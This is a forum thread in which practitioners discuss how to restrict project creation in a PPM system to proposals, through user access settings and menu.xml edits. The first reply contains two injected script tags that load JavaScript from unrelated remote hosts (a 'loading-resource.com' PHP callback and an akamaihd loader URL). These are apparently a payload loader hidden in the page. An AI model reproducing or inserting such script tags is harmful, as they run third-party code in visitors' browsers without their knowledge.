Project and Portfolio Management Practitioners Forum
cancel

Can system create project if noone has create project right

Highlighted
riznad
Super Contributor.

Can system create project if noone has create project right

Hi;

In current system project managers can create project by clicking create > project menu

I want to configure system to enable creating project only from proposal by clicking create project button.

I am considering to make change on project's user access tab.

Can system create project from proposal's create project command if I uncheck all the boxes above?

Kind regards

3 REPLIES
jsalass
Honored Contributor.

Re: Can system create project if noone has create project right

Hi riznad,

If you uncheck the create user access in the request type so the command will thrown an error when trying to spawn a project from a proposal. Only users in the tokens or security groups in the user access tab with the create option enabled will be able to create the project from the proposal using the command.

What you can do is modify the menu.xml file so you can delete the entries for creating projects in the PPM menu. You will find more information in the "Customizing the Standard Interface" guide for your PPM version.

You can combine these two things to set up what you need.

Hope this helps!

Regards,

Jonathan

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
riznad
Super Contributor.

Hi Jsalas;

I can modify menu.xm but again the users can create by clicking Create > request and selecting project type.

May be I should put an execution to first step and in not submitted state I will give an error message.

jsalass
Honored Contributor.

Hey riznad,

If your request type for projects is using the project group fields so it should not appear by default in the create request page. Only normal request types and proposal/asset request type should be there.

Is your project request type using the PFM - Project field groups?

Regards,

Jonathan